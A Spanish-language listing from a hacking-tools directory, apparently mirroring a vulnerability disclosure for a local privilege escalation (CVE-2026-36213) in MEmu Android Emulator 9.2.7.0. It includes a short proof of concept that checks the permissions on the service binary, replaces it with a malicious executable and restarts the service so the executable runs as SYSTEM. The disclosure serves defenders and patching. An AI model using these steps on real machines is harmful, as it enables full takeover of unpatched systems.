Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Escalada de Privilegios Local en el Emulador de Android MEmu 9.2.7.0 a través de Permisos de Binarios de Servicio Inseguros | Parcheado en 9.3.2 | Kitploit
Herramientas/GitHubGitHub/sec-zone/cve-2026-36213
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Escalada de Privilegios Local en el Emulador de Android MEmu 9.2.7.0 a través de Permisos de Binarios de Servicio Inseguros | Parcheado en 9.3.2

Ver Repositorio
51hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-36213

CVE-2026-36213 | Escalada de privilegios local en MEmu Android Emulator 9.2.7.0 mediante permisos inseguros en binario de servicio | Parcheado en 9.3.2

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

Resumen

Una vulnerabilidad de escalada de privilegios local (LPE) en MEmu Android Emulator 9.2.7.0.
El servicio MEmuSVC se ejecuta como NT AUTHORITY\SYSTEM mientras que su binario es editable por cualquier usuario local, permitiendo un compromiso total del sistema.

CampoDetalles
CVECVE-2026-36213
ProductoMEmu Android Emulator (MicroVirt)
Versión afectada9.2.7.0 y anteriores
Versión corregida9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 ALTA AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

Vulnerabilidad

MEmuService.exe está instalado como un servicio de Windows a nivel de SYSTEM con permisos NTFS inseguros:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Cualquier usuario local tiene Control Total
Everyone:(F)        ← Binario escribible por todos

Prueba de concepto

:: Paso 1 - Verificar permisos vulnerables

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Paso 2 - Reemplazar binario (como usuario con pocos privilegios)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Paso 3 - Reiniciar servicio

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Resultado: malicious.exe se ejecuta como NT AUTHORITY\SYSTEM

Script de detección

Disponible en: https://github.com/sec-zone/Hijack-service-binaries

Descargo de responsabilidad

Esta investigación se realizó con fines educativos bajo una política de divulgación responsable.
El autor no es responsable por el mal uso de esta información.

Investigador

Nombre: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Correo electrónico: [email protected]

Descargar herramienta